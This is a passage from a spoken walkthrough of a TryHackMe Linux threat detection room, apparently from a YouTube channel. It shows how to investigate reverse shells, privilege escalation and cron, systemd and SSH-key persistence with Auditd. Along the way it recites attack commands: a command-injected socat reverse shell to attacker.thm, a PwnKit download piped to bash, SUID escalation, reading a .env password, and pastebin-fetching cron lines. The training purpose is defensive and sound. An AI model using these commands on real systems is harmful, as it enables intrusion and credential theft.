me, and that's what you want in there. Next one, now try spawning a reverse shell to the imaginary attacker.thm address. Run 127.0.0.1 and SOCAT TCP attacker.thm 1337 and then exec sh in the web app. What is the flag returned in the try ping me response? So let's go ahead and put that in here. Hit enter and see what it does. Okay, so we can see the flag down here, right there. Okay, and then you can also read through this here. It says the command you just ran would establish a SOCAT reverse shell. If you were an attacker, you would first start a listener right on your attacker box here, which appears to be Kali, and they have that netcat listener set up here on port 1337 listening. Okay. And then it says after you run the SOCAT command, you would see this new connection from the victim machine, creating a shell, create a shell, etc., etc., etc. Okay. And it looks like they fired off hostname to see the information related to that. Okay, so let's go to the next one. Now, look at the exported Auditd logs on home Ubuntu scenario. Which IP spawn a similar reverse shell via the TryPingMe app? Okay, so since we already know that they used ping, that's the information we can go off of. There's other things you can use as well. So we're going to flip over here to the box here. Okay, so let's go ahead and clear all this stuff out. And then I'll paste this in here. And I'm going to pipe this into grep. Okay, inside of here, ping, hit enter, and I'll pull back information regarding that here. Okay, and if we just scroll up a little bit here, you'll see the IP address in question. Okay, you can see it referenced several times here, 10.14.105.255, and it's doing all kinds of commands in here. As you can see, doing who am I and some other things. Okay, from here you can also pivot off of that particular IP address. Okay, so if we want to go ahead and grab it here, let's go and do that here. All right, and then I'm going to clear out the screen. Okay, and then inside of here, I'm going to put that IP address. Hit that, and there we go. So now we can see things related to that particular IP address. You can see it's doing all kinds of things here. Task number 3, privilege escalation. Privilege escalation basics. Another obstacle for attackers is insufficient privileges. Initial access doesn't always mean a full system compromise, and web attacks and exploits often start as low privilege service users. These users can sometimes be restricted to a single folder, example var www.html, or have no ability to download and run malware. In this case, the attackers need to use privilege escalation, which can be achieved through various techniques. For example, to get to the root user, directors may do the following. All right, so let's take a look at this table here. Preceding discovery if privilege escalation then. Okay, so let's look at this. The uname -a shows an old unpatched Ubuntu 16.04. Run an exploit like pwnket wget, so downloading that particular tool here, and then pipe that into bash. The find /bin-perm 4000 detects an env binary or env binary with the sudo flag. Use the sudo vulnerability to get root access, so bin env and then bin bash -p, and the next one, the ls etc ssh exposed an unprotected ssh backup key file. Try using the file to get root access ssh, then root at 127.0.0.1 -i ssh -backup -key. So various different ways you can do that, or attackers can do that. Detecting privilege escalation. Detecting privilege escalation might be tricky because of how different it can be. There are hundreds of SUID misconfigurations and thousands of software vulnerabilities, each exploitable in its own unique way. Thus, a more universal approach would be to detect the surrounding events. For example, review the attack below, which just has 3 steps: discovery, privilege escalation, and exfiltration after the root access is gained. Okay, so detection 1, a spike of discovery commands, so who am I, ID, pwd, ls, etc., and you can see what it does here. Okay, next one, detection 2, a download to the temp directory, wget, gcc, chmod. Okay, detection 3, data exfiltration with scp, who am I, tar, scp. Okay, so doing all kinds of things here that you can build detections around. Even if you don't know the exact mechanics of pwnket exploit, you can still detect anomalies using more common attack indicators. After spotting suspicious activity, you can confirm whether privilege escalation succeeded by comparing the effective user before and after the exploit. If the user differs, the attacker gained elevated privileges, like an example below. So it says looking for reverse shell activity. So once again, they're using au search-i-x pwnket. The pwnket was launched by service user. Look at the UID field. See that here. All right, so once again, they're pivoting off of the PPID. Actually, they're pivoting off the PID this time around. It looks like here. Yeah, 24304. Okay, the pwn kit spawned a root shell. Look at the UID field once again. Okay, you can see right there. And then they're pivoting off of the PID again. Threat actor continues the attack as root user. Who am I? And you can see the UID root right there. Okay, nice. Continue with the TryHackMe scenario and find out what followed the reverse shell. You can start the hunt from au search-i, etc. So once again, go ahead and pause the video, try to answer this question yourself, comment the video, and then we will proceed forward. Hey everybody, this is WireDogSec. Just a quick reminder to subscribe to the channel and hit the notification bell. Once you hit the notification bell, be sure to set to all notifications so you know every time I post to the channel, upload a video, all that good stuff. Let's continue to grow our glorious community here. We are in the cyber trenches. We're not just reporting on it. Be sure to check out my channel as well. I have tons of videos that you can see here, over 300 videos ready for you to check out and learn something from. Be sure to review my posts. I'm frequently posting new things to my channel here, including jobs and everything related to that. Also, I have tons of playlists here that you can review, make it more convenient for you. Anyway, happy defending, happy hacking, enjoy the video. Let's take a look at these questions. Which command line was used to look for the pass keyword in files? All right, and once again, you can use this au search, and then you can add some things on there like grep. So I would grep on like pass key or something like that and see. There's multiple ways to do it. First off, I'm going to take a look at this last one, which is getting the password, looking at the detected.env file. What's the root password? So for this one, you can use this here, this 127.0.0.1 and cat.env.local. Hit that ping, and then it will give you the results here that looks like this. Okay, password equals yada yada. So that's that one. All right, I did that because sometimes this, as you switch tabs here, it removes everything out of here and it's annoying. But anyway, so we already have the answer for that last question, okay, which was this one here, looking at the detected.env file. What was the root password? Anyway, back to this one here. We can use this here, of course, as a starter to build out stuff. All right, so I'm going to paste that in there, and then I'm going to pipe that into grep, and I'm just going to grep on pass here to make things easier. And now you can see things referenced here. You can see that they're using this proc title equals grep-ir pass. Now you can pivot off this information as well. Like you want to take a look at proc title. Okay, so I'm going to up arrow here and delete pass like such. And then we're going to throw in this like that. And now we can see everything here, a lot more details, right? Okay, so let's go to the next one. Which command line was used to escalate privileges to root? So we can see that in here, right? So let's take a look here. You can see that the user find dash name, looking for key, pass, and you can see the grep being used here. You can see the cat of the .env.local. You can see su root right there being used for that. Okay, so let's go and continue on to task number 4, startup persistence. Persistence in Linux. Alone, Linux servers can run for years without a single reboot and are often left untouched unless something breaks. That's absolutely true. Some directors rely on it and do not rush to establish persistence. However, those aiming for long-term access often set up 1 or 2 additional backdoors. As in Windows, there are many ways threat actors persist on Linux. Let's start with the most common ones. Cron persistence. Cron jobs are like scheduled tasks. Windows, they are the simplest way to run a process on schedule and the most popular persistence method. For example, as a part of a big espionage campaign, APT29 deployed a fully functional malware named Goldmax. CrowdStrike blog post if you want to check that out. To ensure the malware survives a reboot, they added a new line to the victim's cron job file located at var spool cron and user. And here's a snippet of that. A line added by APT29 to var spool cron user to run malware on boot. Okay, so they're doing no HUP, home, and then user, hidden directory, malware name, and then it's sending that to dev, null, and etc. etc. Another example is Rock Crypto Miner. After exploiting vulnerabilities in public-facing services like Redis or PHPMyAdmin, Rock downloads the crypto mining script from pastebin and installs it as etc cron.d root cron job. Red Canary blog post, note that the */10 part, which means the script will be re-downloaded every 10 minutes, likely to quickly restore its files in case the IT team accidentally deletes them. Be very annoying. A simplified command that adds the cron job to etc cron.d root. You can see echo, then */10, and you can see the rest there, right? Curl, pastebin, etc., etc. Okay. Systemd persistence. Systemd services host the most critical system components. Nowadays, DNS, SSH, and nearly every web service are organized as separate .service files located at lib systemd system or etc systemd system folders. With root privileges, you can make your own services, as can the threat actors. For example, the Sandworm group once created a cloud-online service to enable its go-getter malware to run on reboot. And here's the mandate report if you want to read that. A simplified content of lib systemd system cloud-online.service file. So you can see inside of that here, it says fake description to mimic a trusted service. Go-getter malware disguised as a trusted file. Detecting persistence. In this room, let's focus on detecting the moment attacker establishes persistence. Both cron jobs and systemd services are defined as simple text files, which means you can monitor them for changes using Auditd. In addition, persistence can be detected by tracking the creation of related processes, specifically cron tab for managing cron jobs and systemctl for managing services. So let's take a look at this table here. Monitor changes in cron job files, etc cron tab, etc cron.d star, var spool cron star, var spool cron tab star. Monitor changes in systemd folders. You can see that here. Monitor related processes such as the following here. Okay, detecting persistence in Auditd. You search -i-f etc systemd, look for file changes inside etc systemd. Okay, so just scroll over a little bit here. All right. Next one, they're looking at cron tab. Look for execution of cron tab command. You can see that here, cron tab -e for that. Okay. Also, the first one here, you can see right here, it looks like they use v editor to do some things here for this malicious.service. Okay, so let's hear. And this task, try to detect 2 persistent methods by using the Auditd logs. AU search -i. Once detected, launch the persistent malware. Example bin malware and get your flag. Note, you might need to switch to root for this task by running sudo su. Okay, so go ahead and try to answer the question yourself, then come back to the video, and then we will proceed. Let's take a look at these questions. What flag did you get after running the malware persisting as a service? So once again, we can use some of this information that we just learned about here in this particular task. AU search on the system D, piped into grep, but then service, and right off the bat you should see something like this. Looks like nano and Etsy system D, system tux.service is what we want to look for there. Okay, after that, you want to go ahead and take a look at that. So we're going to cat it, see what's in there, see how to run it, because you have to run it to get the flag. Okay, and it says exec start equals this. So that's all you have to do is plug that in. So I'm just going to up arrow to do that here, run it, and then it says where did I persist, and we know that it's going to be here in this Etsy system D system tux.service. So plug that in, hit enter, there we go, there's the flag, the first one. Okay, so this next one, you'll have to switch to root here. Okay, so let's take a look at this question. What flag did you get after running the malware persisting as a cron job? I had to switch to root. I'm not sure if y'all had to or not, but this is the way I did it. So I'm just going to go and take a look at that information here. So to get cron tabs, for one, you can go ahead and try to do this here, right? AU search to do that. So I'm just going to copy that here and paste. Okay, so if you can see if there's any information there. We learned earlier where these cron jobs are located. Okay, so if we scroll up a little bit here, var spool cron. Okay, so that's what I used as a reference for this one. So I'm going to clear this out and I'm going to up arrow. All right, so I did ls on that, and you can see there's another item here for root. Okay, so I type in root, and then I'm going to go ahead and cat that here. And you can see at reboot user s bin phoenix. So once again, you're going to put that in there and run it, and then it says where did I persist? Well, we know that it's going to be here in this location, var spool cron tabs, etc. So put that in, hit enter, and I forgot to put that the root at the end of there. So let's try that again. Paste that and then root. There we go. So now we have that. I believe there's a shortcut way to get here too, if I remember correctly. It's like I forgot what it was. There's another command you can do to get to this particular area. I can't remember at the top of my head. If you remember that, put that in the comment section. We're going to continue on, and also if you want to get out of this here, just type in exit. So now you're back to the regular Ubuntu user here. So let's get ready for the next task. Task number 5, count persistence. The previous task was mainly about making the malware survive a reboot, but what about persistent access? As an attacker, you might want to return to the victim in a month to steal more data, but don't leave any malware there. How can you maintain access without malware? It all depends on how you entered in the first place. New user account. If SSH is exposed, the attackers may create a new user account, add it to a privileged group, and then use it for further SSH logins. The detection is simple, as you can track the user creation events through authentication logs and then reconstruct the full process tree with Auditd by starting with AU search -I --PPID and then whatever that's going to be for the example below. Detecting new user account. So they did cat on auth.log, piped into grep -E user and then pipe user mod. So they're looking at both of those here, looks like. New group, support, new user, name support, okay. There's the home directory for it. Add support to group sudo, add support to shadow group sudo, okay. Backdoored SSH keys. Another account persistent method is to backdoor the SSH keys of one of the users and use them for future logins instead of a password. You have already encountered this in the Linux threat detection 2 room where Dota 3 malware added its key to the breached user. This technique is difficult for IT to spot as much as keys can blend in with legitimate ones. For example, so adding SSH backdoor to the authorized keys, echo yada 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 to this here. it's hard to guess which key is a backdoor. Okay, so they're catting that particular area here, and this is legitimate key, then the backdoor key there. Default, authorized SSH keys, public keys are stored in each user's .ssh authorized underscore key file. So your best detection method is to monitor changes to these files using Auditd. Note that relying on process creation events is ineffective, since there are numerous ways to modify SSH keys, some of which aren't properly traced with Auditd. For example, echo then key to authorized underscore key will not be logged, as echo is a shell built in. So detecting SSH backdoor, traces of a backdoor created with echo, etc. Note how the malicious echo command is logged simply as bash. Okay, so they tried a use search on it, and then you can see proc title equals bash there. All right, so exactly what they're talking about. Okay, application persistence. Imagine a WordPress website where the web admin account has been breached. With admin privileges, the attackers can add a backdoor, example, WSO web shell, to the website and run commands through the backdoor. No cron jobs or SSH keys required. Moreover, because the persistence lives in the application layer, Auditd and system logs often never see it. While app level persistence is beyond the scope of this room, you should be aware that it's possible a common scenario. If you verified all possible persistent techniques, but malware somehow reappears after some time, one of your public-facing apps might be compromised. So let's take a look at this fancy graphic here. Number one, if the app allows code execution on the system, says vulnerable WordPress website, because that never happens, right? Exposed IC automation, unprotected SIM/EDR console. 2, the attacker can leave a backdoor inside the app. There's the attacker right there. 3, without a need to persist directly on the operating system level. All right. Now detect 2 more persistent methods on the VM: backdoored user and SSH key. You can use Auditd, once again, a user -I, and authentication logs to answer the questions. So once again, pause the video, try to answer them yourself, come back to the video, and then we will proceed forward. Let's take a look at these questions. Which user was created and added to the pseudo group? All right, so once again, you can reference what we just learned about here in this task here to answer this one, right? So that's what I did. I just copy and pasted this information here, and let's flip over here, enter, and you can see new group, name, Koichi, new user, Koichi, etc. And you can see added to group, pseudo, and the rest of the information there. So Koichi is going to be our answer there. Which file was changed to allow SSH key persistence? For this one, they said to use Auditd. All right, so you can use what we just learned about for this, which was this search here. Okay, so you can just copy and paste that in there, and then you'll see similar information like this, like proc title equal bash, etc. So we're going to see that here in a second. Let's go ahead and clear this out. Enter, and then hit that. Then now you can see that information here. Proc title equal bash, and you can see the name of it right here, root, and then SSH, authorized keys. So we're going to need to grab that here and plug that in as our answer. Okay, so like once again, you can pivot off information here if you need to. Okay, so you can grep that, grep, then inside of here, you can just use title, proc title equals or whatever, and hit enter. There you go. You see some other information that could be related, but just giving you all some tips of where to pivot and some other things that you can do. Okay, so task number 6, target attacks and recap. Target attacks in the Linux threat detection 2 room. You have explored hack and forget attacks such as crypto miner infections. They are automated, do not care about who the victim is, and rarely employ tactics like privilege escalation. However, there can be more complex and more devastating attacks that target specific companies or governments. That's where you would need the learned techniques the most. Linux as entry point. Linux machines are commonly deployed as firewalls, web servers, mail servers, or other public-facing services. Even in organizations where 99% of the infrastructure is Windows-based, a single compromised Linux server can open the door to a corporate network and result in a big impact. That's why, as a SOC analyst, you need to know how to secure all popular operating systems. Yes, that's absolutely true. That could be the initial beachhead into your environment. Let's take a look at this graphic here. Attacker first breach the internet-facing Linux server, which is srv-web01. TryHackMe Active Directory network, then use it to move into the corporate network. So pivoting off of that box here and getting in there. Linux in espionage. Linux machines can store sensitive information or be used in mission-critical networks and thus are often targeted by state-sponsored threat groups. For example, in this espionage campaign, Semantic article, Kimsucky APT installed a backdoor on multiple important Linux targets. Interestingly, they have systemd service persistence, the technique you already know. So let's take a look at this here. Breach the mission critical Linux server. Persist on it via systemd service. You can see that here. And then it says use the persistent malware to remotely access the server when needed. Linux and ransomware. Linux ransomware is on the rise with hypervisors becoming a prime target. Imagine the case, your company runs hundreds of Windows VMs, all sitting on just 3 Linux physical servers, hypervisors. If those hypervisors aren't properly secured, all corporate VMs are at risk. For a real-world example of how attackers breach hypervisors, check out the Varonis article. Okay, so let's look at this real quick. Attacker breached the hypervisor via exploit or SSH, and then Linux hypervisor hosting many Windows VMs. Encrypt all hosted on the hypervisor VMs, no matter the operating system. So this could really ruin your day there. Threat detection recap. After completing the Linux threat detection rooms, you should understand that Linux systems can be complex, but also critical assets to protect. Fortunately, now you can identify the risk and spot the most common techniques across the MITRE ATT&CK matrix. Here's a quick recap of what you learned so far, highlighted in yellow. So let's look at this here. So you can feel free to review this yourself. They covered everything here: initial access, execution, persistence, privilege escalation, discovery, lateral movement, command and control, exfiltration, and impact. So we'll take a minute or two to review that, and we're going to continue on. All right, so questions here. Does Linux ransomware exist and impact organizations worldwide? Yes, we know that. Should you learn Linux threats even if working with Windows? Yes, because you may have a Linux system in your environment, and that could be a beachhead into your environment. Task number 7, conclusion. So let's go ahead and wrap this up. Throughout a series of scenarios and real-world examples, you explored more complex targeted Linux attacks, how adversaries overcome access constraints, how they maintain long-term persistence, and what goals they pursue. Many SOC teams skip Linux monitoring, but now you know why it's a dangerous blind spot and are prepared to detect complete attack chains in SIM or directly on the host. We hope the Auditd practice wasn't too painful and that you enjoyed the Linux threat detection journey. That was interesting. This is the first time I think I've ever used Auditd here. Mainly dealing with Windows systems, but like they said, you may have an environment that has Linux systems in place, and you need to learn how to investigate those systems as well. Okay, so we learned a lot of good and valuable things in this particular module here. So we're going to go ahead and complete this room and wrap up the video. Awesome. Hopefully y'all made it to the end of the video, enjoyed this particular module. And if you want to help support the channel for free, you can like, comment, share, subscribe, and hit that notification bell so you know every time I upload to the channel. Happy hacking, happy defending, stay safe in the cyber trenches. I'll see you later.